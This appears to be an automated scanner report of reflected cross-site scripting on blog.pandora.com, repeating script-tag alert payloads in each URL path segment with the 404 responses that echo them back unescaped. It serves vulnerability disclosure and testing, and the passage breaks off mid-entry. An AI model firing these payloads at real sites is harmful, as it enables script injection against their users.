GET /pandora/archives/201052dc5<script>alert(1)</script>f6f7326f783/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/201052dc5<script>alert(1)</script>f6f7326f783/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 46f70<script>alert(1)</script>135aca784e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1046f70<script>alert(1)</script>135aca784e3/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1046f70<script>alert(1)</script>135aca784e3/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 639cf<script>alert(1)</script>9472b7ae95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora639cf<script>alert(1)</script>9472b7ae95/archives/2010/10/an-update-on-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 368
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora639cf<script>alert(1)</script>9472b7ae95/archives/2010/10/an-update-on-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f725<script>alert(1)</script>f0ece6ca7d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6f725<script>alert(1)</script>f0ece6ca7d6/2010/10/an-update-on-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives6f725<script>alert(1)</script>f0ece6ca7d6/2010/10/an-update-on-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4a6a1<script>alert(1)</script>e95f295a886 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20104a6a1<script>alert(1)</script>e95f295a886/10/an-update-on-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20104a6a1<script>alert(1)</script>e95f295a886/10/an-update-on-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 93473<script>alert(1)</script>78dc3d1265 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1093473<script>alert(1)</script>78dc3d1265/an-update-on-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 368
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1093473<script>alert(1)</script>78dc3d1265/an-update-on-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 57715<script>alert(1)</script>6156d1c3fc4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10/an-update-on-pa.html57715<script>alert(1)</script>6156d1c3fc4 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10/an-update-on-pa.html57715<script>alert(1)</script>6156d1c3fc4 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a04ff<script>alert(1)</script>1d9d8606f67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa04ff<script>alert(1)</script>1d9d8606f67/archives/2010/10/hoboken-town-ha.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa04ff<script>alert(1)</script>1d9d8606f67/archives/2010/10/hoboken-town-ha.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b806<script>alert(1)</script>2370e6bb9b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6b806<script>alert(1)</script>2370e6bb9b0/2010/10/hoboken-town-ha.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives6b806<script>alert(1)</script>2370e6bb9b0/2010/10/hoboken-town-ha.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8496d<script>alert(1)</script>895ffd7f0fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20108496d<script>alert(1)</script>895ffd7f0fa/10/hoboken-town-ha.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20108496d<script>alert(1)</script>895ffd7f0fa/10/hoboken-town-ha.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 297e2<script>alert(1)</script>6746ce0f566 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10297e2<script>alert(1)</script>6746ce0f566/hoboken-town-ha.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10297e2<script>alert(1)</script>6746ce0f566/hoboken-town-ha.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5a107<script>alert(1)</script>7d716b47026 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10/hoboken-town-ha.html5a107<script>alert(1)</script>7d716b47026 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10/hoboken-town-ha.html5a107<script>alert(1)</script>7d716b47026 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeade<script>alert(1)</script>36a25f2db79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraaeade<script>alert(1)</script>36a25f2db79/archives/2010/10/pandora-one-gif.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraaeade<script>alert(1)</script>36a25f2db79/archives/2010/10/pandora-one-gif.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f952<script>alert(1)</script>8da5452ad57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5f952<script>alert(1)</script>8da5452ad57/2010/10/pandora-one-gif.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5f952<script>alert(1)</script>8da5452ad57/2010/10/pandora-one-gif.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2f17b<script>alert(1)</script>64bc9a276f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20102f17b<script>alert(1)</script>64bc9a276f8/10/pandora-one-gif.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20102f17b<script>alert(1)</script>64bc9a276f8/10/pandora-one-gif.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 976b9<script>alert(1)</script>41935888f21 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10976b9<script>alert(1)</script>41935888f21/pandora-one-gif.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:42 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10976b9<script>alert(1)</script>41935888f21/pandora-one-gif.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27156<script>alert(1)</script>bb3cfa82e19 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10/pandora-one-gif.html27156<script>alert(1)</script>bb3cfa82e19 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:45 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10/pandora-one-gif.html27156<script>alert(1)</script>bb3cfa82e19 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27324<script>alert(1)</script>f28ce60039 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora27324<script>alert(1)</script>f28ce60039/archives/2010/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora27324<script>alert(1)</script>f28ce60039/archives/2010/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31461<script>alert(1)</script>df1666c9e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives31461<script>alert(1)</script>df1666c9e6/2010/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives31461<script>alert(1)</script>df1666c9e6/2010/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1142<script>alert(1)</script>f83864e82ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
